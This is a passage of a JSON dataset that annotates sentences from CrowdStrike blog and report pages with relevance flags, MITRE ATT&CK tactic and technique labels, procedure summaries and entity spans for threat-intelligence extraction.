faster than going through each separate infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s5-26648c", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 5, "context_before": "The goal of the project was to map analytics across disparate infrastructures and cloud services to reduce alert noise and quickly identify abnormal and evasive behaviors faster than going through each separate infrastructure.", "sentence_text": "The project uncovered 14 key cloud analytics for Azure and GCP cloud environments mapped to the MITRE ATT&CK® Cloud Matrix and indicative of cloud- specific adversary behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p1-s6-d31ffa", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 1, "sentence_id": 6, "context_before": "The project uncovered 14 key cloud analytics for Azure and GCP cloud environments mapped to the MITRE ATT&CK® Cloud Matrix and indicative of cloud- specific adversary behavior.", "sentence_text": "Featured\nRecent\nVideo\nCategory\nStart Free Trial The CrowdStrike Falcon ® platform identifies and protects customers against all adversary tactics uncovered in the project.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s7-bbaa6d", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "Featured\nRecent\nVideo\nCategory\nStart Free Trial The CrowdStrike Falcon ® platform identifies and protects customers against all adversary tactics uncovered in the project.", "sentence_text": "The results of this research are presented in a blueprint document that maps some of the key cloud analytics and offers best practices and lessons learned.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s8-13b72f", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "The results of this research are presented in a blueprint document that maps some of the key cloud analytics and offers best practices and lessons learned.", "sentence_text": "Protectors can use this document as a guide for identifying and mapping cloud analytics in their environments.\nidentified in the MITRE CTID Cloud Analytics project (source) (click to enlarge)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s9-2dba74", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "Protectors can use this document as a guide for identifying and mapping cloud analytics in their environments.\nidentified in the MITRE CTID Cloud Analytics project (source) (click to enlarge)", "sentence_text": "Detecting Adversaries in the Cloud Is Hard Detecting adversaries using cloud analytics is hard — because it’s expensive to do it right.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s10-819ee3", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "Detecting Adversaries in the Cloud Is Hard Detecting adversaries using cloud analytics is hard — because it’s expensive to do it right.", "sentence_text": "The industry is trying to solve cloud security by managing configurations or applying a legacy antivirus mindset to it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s11-d39df7", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "The industry is trying to solve cloud security by managing configurations or applying a legacy antivirus mindset to it.", "sentence_text": "Neither will succeed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p2-s12-7affc0", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "Neither will succeed.", "sentence_text": "Comprehensively securing cloud environments requires the powerful combination of agentless capabilities that Featured protect against misconfigurations and control plane attacks, along Recent with agent-based runtime security to protect your workloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s13-113fcb", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 13, "context_before": "Comprehensively securing cloud environments requires the powerful combination of agentless capabilities that Featured protect against misconfigurations and control plane attacks, along Recent with agent-based runtime security to protect your workloads.", "sentence_text": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project   with a short window of opportunity to identify and contain threats | BLOG to their infrastructure — otherwise the organization could suffer a costly breach if the threat actor is able to move laterally and expand across the cloud estate.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Threat actors may move laterally and expand across the cloud environment if not detected quickly, leading to a breach.", "entities": [ { "text": " identify and contain threats ", "start": 115, "end": 145, "label": "Action" }, { "text": "infrastructure ", "start": 161, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "threat actor", "start": 241, "end": 253, "label": "ThreatActor" }, { "text": "move laterally", "start": 265, "end": 279, "label": "Action" }, { "text": "expand across the cloud estate", "start": 284, "end": 314, "label": "Action" }, { "text": "breach ", "start": 227, "end": 234, "label": "Action" } ] }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s14-f73f2b", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 14, "context_before": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project   with a short window of opportunity to identify and contain threats | BLOG to their infrastructure — otherwise the organization could suffer a costly breach if the threat actor is able to move laterally and expand across the cloud estate.", "sentence_text": "What’s necessary to stop breaches is access to usable, accurate and actionable real- time analytics and cloud controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s15-00d689", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "What’s necessary to stop breaches is access to usable, accurate and actionable real- time analytics and cloud controls.", "sentence_text": "Workload Protection\nThe CrowdStrike Falcon ® platform was born in the cloud with a mission to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s16-e239f8", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 16, "context_before": "Workload Protection\nThe CrowdStrike Falcon ® platform was born in the cloud with a mission to stop breaches.", "sentence_text": "The CrowdStrike Falcon ® platform sets the new standard in cloud security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s17-15104b", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 17, "context_before": "The CrowdStrike Falcon ® platform sets the new standard in cloud security.", "sentence_text": "Watch this demo to see the Falcon platform in action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s18-752372", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "Watch this demo to see the Falcon platform in action.", "sentence_text": "The Falcon platform can offer behavioral detections by using the power of the CrowdStrike Security Cloud and cloud data analytics to harmonize runtime events and produce cloud analytics indicative of real-time adversary behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s19-b0bc3b", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 19, "context_before": "The Falcon platform can offer behavioral detections by using the power of the CrowdStrike Security Cloud and cloud data analytics to harmonize runtime events and produce cloud analytics indicative of real-time adversary behavior.", "sentence_text": "It correlates new and historical events and malicious indicators, such as suspicious login activity or privilege escalations, to detect adversarial behavioral patterns against end-to-end activity events from the cloud control planes in near real time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s20-44d950", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 20, "context_before": "It correlates new and historical events and malicious indicators, such as suspicious login activity or privilege escalations, to detect adversarial behavioral patterns against end-to-end activity events from the cloud control planes in near real time.", "sentence_text": "For example, CrowdStrike’s AWS IAM policy behavior detection monitoring will alert customers when an API call has been made to modify an IAM role policy to allow public access — essentially allowing a public AWS user to inherit the permissions granted by the IAM role.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "The detection alerts when an API call modifies an IAM role policy to allow public access, enabling a public AWS user to inherit the role’s permissions.", "entities": [ { "text": "AWS IAM policy behavior detection monitoring", "start": 27, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "alert customers", "start": 77, "end": 92, "label": "Action" }, { "text": "API call", "start": 101, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "modify an IAM role policy", "start": 127, "end": 152, "label": "Action" }, { "text": "allow public access", "start": 156, "end": 175, "label": "Action" }, { "text": "public AWS user", "start": 201, "end": 216, "label": "Infrastructure_Indicator" }, { "text": "inherit the permissions granted by the IAM role", "start": 220, "end": 267, "label": "Action" } ] }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s21-d7c9b7", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 21, "context_before": "For example, CrowdStrike’s AWS IAM policy behavior detection monitoring will alert customers when an API call has been made to modify an IAM role policy to allow public access — essentially allowing a public AWS user to inherit the permissions granted by the IAM role.", "sentence_text": "This behavior could be used by an adversary to expand and elevate their access via a user account they already control.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": null, "procedure": "An adversary may use this behavior to expand and escalate access through an already controlled user account", "entities": [ { "text": "adversary ", "start": 34, "end": 44, "label": "ThreatActor" }, { "text": "expand and elevate their access", "start": 47, "end": 78, "label": "Action" }, { "text": "user account", "start": 85, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "already control", "start": 103, "end": 118, "label": "Action" } ] }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s22-8928d2", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 22, "context_before": "This behavior could be used by an adversary to expand and elevate their access via a user account they already control.", "sentence_text": "monitors for and alerts customers when a rapid series of calls are observed to the EC2 service that often aligns with how adversaries set up miners.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "The system alerts when rapid EC2 API calls occur in a pattern commonly used by adversaries when setting up cryptominers", "entities": [ { "text": "monitors for and alerts customers", "start": 0, "end": 33, "label": "Action" }, { "text": "rapid series of calls", "start": 41, "end": 62, "label": "Action" }, { "text": "EC2 service", "start": 83, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "adversaries ", "start": 122, "end": 134, "label": "ThreatActor" }, { "text": "set up miners.", "start": 134, "end": 148, "label": "Action" } ] }, { "uid": "crowdstrike-43_crowdstrike_report-p3-s23-a75a65", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 3, "sentence_id": 23, "context_before": "monitors for and alerts customers when a rapid series of calls are observed to the EC2 service that often aligns with how adversaries set up miners.", "sentence_text": "This may include EC2 enumeration, VPC creation and instance run commands all executed in quick succession.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Adversaries may perform EC2 enumeration, create VPCs, and run instances in rapid succession when setting up miners", "entities": [ { "text": "EC2 enumeration", "start": 17, "end": 32, "label": "Action" }, { "text": "VPC creation", "start": 34, "end": 46, "label": "Action" }, { "text": "instance run commands", "start": 51, "end": 72, "label": "Action" }, { "text": "executed in quick succession", "start": 77, "end": 105, "label": "Action" } ] }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s24-51e1af", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 24, "context_before": "This may include EC2 enumeration, VPC creation and instance run commands all executed in quick succession.", "sentence_text": "  | BLOG sophisticated adversaries demonstrates that we understand what the current industry challenges are and we have addressed them with a clear adversary-focused approach to detecting malicious behavior to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s25-cbe936", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 25, "context_before": "  | BLOG sophisticated adversaries demonstrates that we understand what the current industry challenges are and we have addressed them with a clear adversary-focused approach to detecting malicious behavior to stop breaches.", "sentence_text": "See for yourself how the industry-leading CrowdStrike Falcon ® platform protects your cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s26-049182", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 26, "context_before": "See for yourself how the industry-leading CrowdStrike Falcon ® platform protects your cloud environments.", "sentence_text": "Start your 15-day free trial today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s27-b78bf7", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 27, "context_before": "Start your 15-day free trial today.", "sentence_text": "cybersecurity in the public interest, in particular to help organizations improve visibility and understanding of adversary tradecraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s28-53ea78", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 28, "context_before": "cybersecurity in the public interest, in particular to help organizations improve visibility and understanding of adversary tradecraft.", "sentence_text": "Past initiatives such as the Top MITRE ATT&CK ® Techniques project — which enabled defenders to prioritize and take actions against key TTPs — as well as the recent Cloud Analytics project underline our commitment to leading the way in advancing the state of security so defenders can better secure their infrastructures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s29-275e26", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 29, "context_before": "Past initiatives such as the Top MITRE ATT&CK ® Techniques project — which enabled defenders to prioritize and take actions against key TTPs — as well as the recent Cloud Analytics project underline our commitment to leading the way in advancing the state of security so defenders can better secure their infrastructures.", "sentence_text": "Learn how you can stopcloudbreacheswithCrowdStrike unified cloud security posture management and breach prevention for multi-cloud and hybrid environments — all in one lightweight platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s30-bed41c", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 30, "context_before": "Learn how you can stopcloudbreacheswithCrowdStrike unified cloud security posture management and breach prevention for multi-cloud and hybrid environments — all in one lightweight platform.", "sentence_text": "Read about adversaries tracked by CrowdStrike in 2021 in the 2023CrowdStrikeGlobalThreatReport and in the 2022Falcon OverWatch™ThreatHuntingReport.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s31-0aee47", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 31, "context_before": "Read about adversaries tracked by CrowdStrike in 2021 in the 2023CrowdStrikeGlobalThreatReport and in the 2022Falcon OverWatch™ThreatHuntingReport.", "sentence_text": "Test CrowdStrike next-gen AV for yourself.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s32-fef969", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 32, "context_before": "Test CrowdStrike next-gen AV for yourself.", "sentence_text": "Start your freetrial ofFalconPrevent™ today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p4-s33-7c8559", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 4, "sentence_id": 33, "context_before": "Start your freetrial ofFalconPrevent™ today.", "sentence_text": " Tweet  Share Featured Recent Video Category Start Free Trial Adversaries weaponize a", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p5-s34-5aace5", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 5, "sentence_id": 34, "context_before": " Tweet  Share Featured Recent Video Category Start Free Trial Adversaries weaponize a", "sentence_text": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project Download re   | BLOG Related Content New User Experience Transforms Interaction with the Falcon Platform How Falcon ASPM Secures GenAI Applications and Lessons from Dogfooding Leader in Cloud Workload Protection Platforms CATEGORIES AI & Machine Learning 41 Cloud & Application Security 136 Data Protection 17 Endpoint Security & XDR 330 Engineering & Tech 84 Executive Viewpoint 176 Exposure Management 107 From The Front Lines 197", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p5-s35-a78841", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 5, "sentence_id": 35, "context_before": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project Download re   | BLOG Related Content New User Experience Transforms Interaction with the Falcon Platform How Falcon ASPM Secures GenAI Applications and Lessons from Dogfooding Leader in Cloud Workload Protection Platforms CATEGORIES AI & Machine Learning 41 Cloud & Application Security 136 Data Protection 17 Endpoint Security & XDR 330 Engineering & Tech 84 Executive Viewpoint 176 Exposure Management 107 From The Front Lines 197", "sentence_text": "Next-Gen Identity Security 60", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p5-s36-77dd36", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 5, "sentence_id": 36, "context_before": "Next-Gen Identity Security 60", "sentence_text": "Next-Gen SIEM & Log Management 107 Featured Public Sector 40", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p5-s37-439df2", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 5, "sentence_id": 37, "context_before": "Next-Gen SIEM & Log Management 107 Featured Public Sector 40", "sentence_text": "Recent Small Business 11 Video Category Threat Hunting & Intel 204 Start Free Trial CONNECT WITH US", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s38-ce2f43", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 38, "context_before": "Recent Small Business 11 Video Category Threat Hunting & Intel 204 Start Free Trial CONNECT WITH US", "sentence_text": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project   | BLOG SUBSCRIBE Sign up now to receive the latest notifications and updates from CrowdStrike.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s39-f4044b", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 39, "context_before": "11/7/25, 5:18 AM CrowdStrike Sponsors New MITRE Cloud Analytics Project   | BLOG SUBSCRIBE Sign up now to receive the latest notifications and updates from CrowdStrike.", "sentence_text": "See Demo\n CrowdStrike Achieves Red Hat", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s41-ee53e5", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 41, "context_before": "OpenShift", "sentence_text": "Do You Know", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s42-a3174f", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 42, "context_before": "Do You Know", "sentence_text": "Who’s in Your Cloud?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s43-19dd4a", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 43, "context_before": "Who’s in Your Cloud?", "sentence_text": "Preventing Certification: Streamlining Visibility and Identity-Based Threats with CIEM ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-43_crowdstrike_report-p7-s44-a910c5", "source": "crowdstrike", "doc_id": "43_crowdstrike_report", "page_number": 7, "sentence_id": 44, "context_before": "Preventing Certification: Streamlining Visibility and Identity-Based Threats with CIEM ", "sentence_text": "Automating Protection for OpenShift    ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p1-s1-50bf4a", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "APJ\neCRIME2025 LANDSCAPE\nREPORT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p2-s2-6eb7f6", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "APJ\neCRIME2025 LANDSCAPE\nREPORT", "sentence_text": "Table of\nContents\nExecutive Summary 3 eCrime Overview 4 Big Game Hunting 4 Underground Ecosystem 6 Targeted eCrime Threats 9 Observed eCrime Service Providers 12 Vietnam-Based Threats 14 Conclusion 15 Recommendations 16 About CrowdStrike 18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s3-5e808f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 3, "context_before": "Table of\nContents\nExecutive Summary 3 eCrime Overview 4 Big Game Hunting 4 Underground Ecosystem 6 Targeted eCrime Threats 9 Observed eCrime Service Providers 12 Vietnam-Based Threats 14 Conclusion 15 Recommendations 16 About CrowdStrike 18", "sentence_text": "Executive\nSummary\nA new era of cyber threats has emerged in the Asia Pacific and Japan (APJ)\nregion, one marked by the rise of the enterprising adversary — a term introduced in the CrowdStrike 2025 Global Threat Report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s4-2ba67e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 4, "context_before": "Executive\nSummary\nA new era of cyber threats has emerged in the Asia Pacific and Japan (APJ)\nregion, one marked by the rise of the enterprising adversary — a term introduced in the CrowdStrike 2025 Global Threat Report.", "sentence_text": "This modern class of threat actor operates with business-like discipline, executing attacks with strategic precision, scalable infrastructure, and a clear focus on maximizing impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s5-194783", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 5, "context_before": "This modern class of threat actor operates with business-like discipline, executing attacks with strategic precision, scalable infrastructure, and a clear focus on maximizing impact.", "sentence_text": "Their methods reflect a calculated approach that mirrors corporate efficiency, enabling them to reach their objectives faster and with greater consequence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s6-4fe778", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 6, "context_before": "Their methods reflect a calculated approach that mirrors corporate efficiency, enabling them to reach their objectives faster and with greater consequence.", "sentence_text": "In this environment, innovation is essential to stay ahead.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s7-abd4ab", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 7, "context_before": "In this environment, innovation is essential to stay ahead.", "sentence_text": "Organizations across APJ must adopt advanced technologies and proactive threat hunting strategies to outpace adversaries that are constantly evolving their tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s8-f9153b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 8, "context_before": "Organizations across APJ must adopt advanced technologies and proactive threat hunting strategies to outpace adversaries that are constantly evolving their tactics.", "sentence_text": "These threat actors exploit both technical and human vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s9-c40ada", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 9, "context_before": "These threat actors exploit both technical and human vulnerabilities.", "sentence_text": "These blind spots offer attackers undetected entry points for data theft, lateral movement, or broader system compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s10-06dc9c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 10, "context_before": "These blind spots offer attackers undetected entry points for data theft, lateral movement, or broader system compromise.", "sentence_text": "Counter Adversary Operations comprises two closely integrated teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s11-3029d3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 11, "context_before": "Counter Adversary Operations comprises two closely integrated teams.", "sentence_text": "The CrowdStrike OverWatch team uses this intelligence to conduct proactive threat hunting across customer telemetry to detect and address malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s12-897c95", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 12, "context_before": "The CrowdStrike OverWatch team uses this intelligence to conduct proactive threat hunting across customer telemetry to detect and address malicious activity.", "sentence_text": "Together, these teams protect thousands of customers from the most sophisticated adversaries by providing the intelligence and threat hunting skills and resources that most organizations lack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s13-c86b41", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 13, "context_before": "Together, these teams protect thousands of customers from the most sophisticated adversaries by providing the intelligence and threat hunting skills and resources that most organizations lack.", "sentence_text": "A diverse mix of regional and global eCrime threat actors is operating across the evolving APJ eCrime landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s14-b9983b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 14, "context_before": "A diverse mix of regional and global eCrime threat actors is operating across the evolving APJ eCrime landscape.", "sentence_text": "In addition to major ransomware groups that impact organizations globally, lesser-known threat actors are actively targeting the APJ region, especially through underground Chinese-language channels that support phishing, credential theft, and monetization campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p3-s15-ede11c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "In addition to major ransomware groups that impact organizations globally, lesser-known threat actors are actively targeting the APJ region, especially through underground Chinese-language channels that support phishing, credential theft, and monetization campaigns.", "sentence_text": "These financially motivated cybercriminals are referred to as SPIDERs in CrowdStrike’s adversary naming convention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p4-s16-2f573e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 4, "sentence_id": 16, "context_before": "These financially motivated cybercriminals are referred to as SPIDERs in CrowdStrike’s adversary naming convention.", "sentence_text": "MANUFACTURING\n3Ø.1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p4-s17-6ae59f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 4, "sentence_id": 17, "context_before": "MANUFACTURING\n3Ø.1", "sentence_text": "%\nPROFESSIONAL\nSERVICES\n14.2%\nFINANCIAL\nSERVICES\n14.2%\nINDUSTRIAL AND\nENGINEERING\n14.5%\nTECHNOLOGY\n26.9%\nINDIA\nAUSTRALIA\nJAPAN\nTAIWAN\nSINGAPORE\nINDONESIA\nMALAYSIA\nCHINA\nTHAILAND\nNEW ZEALAND\nØ 5Ø 1ØØ 15Ø 2ØØ 1 This number represents only victims that refused to pay a ransom and consequently had data leaked", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p5-s18-285825", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 5, "sentence_id": 18, "context_before": "%\nPROFESSIONAL\nSERVICES\n14.2%\nFINANCIAL\nSERVICES\n14.2%\nINDUSTRIAL AND\nENGINEERING\n14.5%\nTECHNOLOGY\n26.9%\nINDIA\nAUSTRALIA\nJAPAN\nTAIWAN\nSINGAPORE\nINDONESIA\nMALAYSIA\nCHINA\nTHAILAND\nNEW ZEALAND\nØ 5Ø 1ØØ 15Ø 2ØØ 1 This number represents only victims that refused to pay a ransom and consequently had data leaked", "sentence_text": "These adversaries’ regional victim proportions are similar to the overall APJ-based big game hunting (BGH) victim proportions, indicating the adversaries likely targeted relevant APJ-based entities opportunistically rather than with overall strategic 